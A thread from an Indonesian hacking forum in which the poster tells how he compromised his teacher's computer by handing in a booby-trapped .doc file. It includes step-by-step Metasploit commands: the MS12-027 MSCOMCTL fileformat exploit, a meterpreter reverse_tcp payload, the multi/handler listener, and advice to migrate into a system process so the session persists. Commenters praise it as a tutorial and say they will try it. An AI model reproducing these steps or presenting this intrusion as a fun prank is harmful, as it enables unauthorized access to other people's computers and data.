[Clound_Carbelius]

halo semua...
udah lama gw gak update di mari, sibuk skolah

ane mau curhat,sekalian share ilmu nih

Spoiler! :

waktu itu saya ada tugas sekolah,mengunakan Ms.Office Word
semua teman saya sudah memberikan tugas mereka masing-masing lewat flash disk nya

dan saya lagi itu kebetulan tugas nya lupa di copy ke flash disk -_-
idea gila ini datang ketika saya mengetikan "route" pada laptop saya
dan saya melakukan scaning dengan Nmap.ternyata saya dan guru saya berada dalam satu jaringan yang sama

idea saya adalah membuat overlow aplikasi ms.office guru saya,agar dia tak bisa melihat tugas saya.
karna file .doc saya ini bukan ducument sebenar nya,melainkan payload :v

dan saya setting autorun pada flash disk,
sebelum mendatangi meja guru tersebut saya sudah menjalankan Reverse_tcp,dan mendengarkan ip yg masuk ke meterpreter
hanya tinggal menungu korban menjalankan file saya..

dengan bangga saya mengahpiri meja guru itu
dan menyolokan Flash saya sendiri
alhasil aplikasi guru saya itu langsung "Not Responding"
saya beralasan,kalau file tersebut terkena virus
dan minta izin untuk ngumpulin lagi besok

begitu saya kembali ke meja saya,meterpreter terbuka
rencana sih mau di jailin tuh guru
tapi sian ah =)) )

sekian cerita dari saya Clound

tapi bagaimana cara membuat Payload berextension .doc
:-

ketik di msfconsole kalian :

> use exploit/windows/fileformat/ms12_027_mscomctl_bof
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

tahap ini kita hanya baru membuat file payload nya aja
file payload nya berada di folder : /root/.msf4/local/

jika sudah siap semua,
langsung jalankan exploit multi_handler

> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set lhost
> exploit

nah,tinggal tungguin aja korban menjalankan payload tersebut



tambahan sedikit,
begitu ms.office "not responding"
biasa nya dia langsung exit dengan sendiri nya,arti nya payload kita juga akan exit

segera lakukan migrate ke aplikasi lain,dengan membaca proses yg di lakukan si target



karna kalau udah migrate,meterpreter kita tak bisa di hentikan,apa lagi klo migrate nya ke prosses system

ok,thank's sekian dari gw Clound

gak nolak di sambit cendol

[ChelvinCesio]

wahaha =)) sudah menjadi ciri khas om Clound adalah Gokill )
Nice tutor om, ijin coba :-bd :-bd

[Clound_Carbelius]

wahaha =)) sudah menjadi ciri khas om Clound adalah Gokill )
Nice tutor om, ijin coba :-bd :-bd

nama nya orang kepepet.apa aja pasti di lakuin om =))
#the power off Kepepet =))

monggo :-bd
share di mari om hasil nya

[wine trochanter]

ohh exploit ini yahh keduluan di buat

[naice]

exploit pake ms.word? gokil juga ide ente

[Clound_Carbelius]

exploit pake ms.word? gokil juga ide ente

bkan ms.word di jadiin alat exploit om,kya msf \m/
maksud nya tuh file .doc nya yg di jadiin payload

tepat nya
bakdor berxtensi .doc :d

[zee eichel]

itu juga akibat guru gk mau pake antivirus bagus .. akhirnya di isengin deh ama murid2nya hahaha ... nice post bro

[abdee_dillah$]

sip keren ada jebakan betman'a

[kakus130908$]

\m/ boleh juga nih idenya \m/
waktu itu ane pernah punya ide begini tapi belom ketemu prakteknya
manceb bro :-bd

[wahyuardan]

apakah semua versi ms.office om yang terkena buffer overlow..?atau versi tahun berapa..?
Nice tuturial om